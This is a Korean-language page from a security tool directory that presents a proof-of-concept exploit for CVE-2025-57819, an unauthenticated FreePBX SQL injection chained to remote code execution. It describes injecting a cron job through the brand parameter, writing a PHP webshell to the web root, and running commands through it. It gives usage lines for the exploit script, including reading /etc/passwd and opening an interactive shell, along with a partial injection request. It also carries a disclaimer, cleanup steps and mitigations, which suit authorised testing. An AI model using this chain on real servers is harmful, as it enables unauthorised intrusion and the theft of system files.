Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/neobee714/cve-2025-57819-poc
Vulnerability ScannersCode AnalysisExploitationWeb SecurityLearning & Education
GitHubneobee714/cve-2025-57819-poc

CVE-2025-57819-POC

FreePBX 인증되지 않은 SQL 인젝션으로 인한 원격 코드 실행, FreePBX 15 (15.0.66 미만), 16 (16.0.89 미만), 17 (17.0.3 미만). 이 취약점은 상용 'endpoint' 모듈에 있으며, 사용자 입력 필터링이 불충분하여 인증되지 않은 공격자가 관리자 권한을 우회하고 SQL 인젝션을 실행하며, 최종적으로 원격 코드 실행을 달성할 수 있습니다.

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-57819 — FreePBX SQL 주입 → RCE PoC

CVE-2025-57819은 FreePBX의 치명적인 SQL 주입 취약점으로, 인증되지 않은 공격자가 SQL 주입과 크론 작업 주입을 연계하여 원격 코드 실행을 달성할 수 있게 합니다.

⚠️ 면책 조항: 이 저장소는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에 이 익스플로잇을 무단 사용하는 것은 불법입니다. 작성자는 어떠한 오용 또는 손해에 대해 책임을 지지 않습니다.


취약점 개요

필드세부 정보
CVECVE-2025-57819
영향받는 제품FreePBX (인증 전)
취약점 유형SQL 주입 (스택드 쿼리)
영향원격 코드 실행 (RCE)
공격 경로네트워크 (HTTP GET)
필요한 인증❌ 없음

익스플로잇 체인

root@kitploit:~
┌────────────────────────────────────────────────────────────────┐
│ 1. SQL Injection                                               │
│    POST /admin/ajax.php?brand= → stacked query                 │
│    INSERT INTO cron_jobs …                                     │
├────────────────────────────────────────────────────────────────┤
│ 2. Cron Job Injection                                          │
│    Malicious cron job writes base64-decoded PHP webshell       │
│    to /var/www/html/shell.php                                  │
├────────────────────────────────────────────────────────────────┤
│ 3. WebShell Access                                             │
│    GET /shell.php?cmd=<command> → arbitrary code execution     │
└────────────────────────────────────────────────────────────────┘

작동 방식

  1. /admin/ajax.php 엔드포인트는 brand 매개변수를 적절한 검증 없이 처리하여 스택드 SQL 쿼리를 허용합니다.
  2. 공격자는 매분 악성 명령을 예약하는 INSERT INTO cron_jobs 문을 주입합니다.
  3. 크론 작업은 base64로 인코딩된 PHP 웹셸을 디코딩하여 웹 루트에 작성합니다.
  4. 작성된 후 공격자는 웹셸을 통해 임의의 시스템 명령을 실행할 수 있습니다.

빠른 시작

root@kitploit:~
# Clone
git clone [email protected]:Neobee714/CVE-2025-57819-POC.git
cd CVE-2025-57819-POC

# Install dependency
pip install requests

# Basic usage
python exploit.py <target>

# Drop into interactive shell after injection
python exploit.py <target> --shell

# Execute a single command
python exploit.py <target> --cmd "cat /etc/passwd"

사용법

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [--shell] [--cmd CMD]
                  [--param PARAM] [--no-wait] [-v]
                  target

CVE-2025-57819 – FreePBX SQLi → Cron → WebShell

positional arguments:
  target                target hostname or IP (with optional scheme)

options:
  -h, --help            show this help message and exit
  -p, --port PORT       port (default: 80/443)
  --shell               drop into interactive shell after injection
  --cmd CMD             execute a single command via the webshell
  --param PARAM         webshell query-string parameter (default: cmd)
  --no-wait             skip the webshell-verification poll
  -v, -vv               increase verbosity (-v info, -vv debug)

예시

root@kitploit:~
# Target with default HTTP port
python exploit.py connected.htb

# Target with custom port
python exploit.py 10.10.11.100 -p 8080

# Inject, verify, and drop into interactive shell
python exploit.py 10.10.11.100 --shell

# Inject and run a single command
python exploit.py connected.htb --cmd "whoami"

# Skip the verification poll (if you already know the shell is live)
python exploit.py connected.htb --no-wait --cmd "id"

# Verbose output for debugging
python exploit.py connected.htb -vv --shell

대화형 셸

--shell을 사용하면 스크립트가 의사 터미널로 전환됩니다:

root@kitploit:~
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
[*] Shell session ended.

exit(또는 Ctrl-C, Ctrl-D)를 입력하여 세션을 종료합니다.


수동 검증

수동 단계를 선호하는 경우, 익스플로잇은 세 가지 작업을 수행합니다:

1단계 – 크론 작업 주입

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x'%20%3BINSERT%20INTO%20cron_jobs%20...

2단계 – 크론 실행까지 약 60초 대기

주입된 크론 작업(* * * * *)은 매분 실행되어 웹셸을 작성합니다.

3단계 – 웹셸 접근

root@kitploit:~
GET /shell.php?cmd=id

정리

테스트 후 웹셸과 크론 작업 항목을 제거하십시오:

root@kitploit:~
DELETE FROM cron_jobs WHERE command LIKE '%base64%';

그런 다음 파일시스템에서 /var/www/html/shell.php를 삭제하십시오.


영향받는 버전

  • 공급업체 패치 이전의 FreePBX 버전
  • 인증 없이 /admin/ajax.php에 접근 가능한 시스템

완화 조치

  • 공급업체가 제공한 보안 패치를 즉시 적용
  • FreePBX 관리 인터페이스에 대한 네트워크 접근 제한
  • FreePBX 데이터베이스 사용자에게 최소 권한 부여 (심층 방어)

참고 자료

  • FreePBX 보안 권고
  • OWASP SQL Injection

라이선스

이 프로젝트는 교육 및 방어적 보안 연구 목적으로만 제공됩니다. 이 문서 상단의 면책 조항을 참조하십시오.

도구 다운로드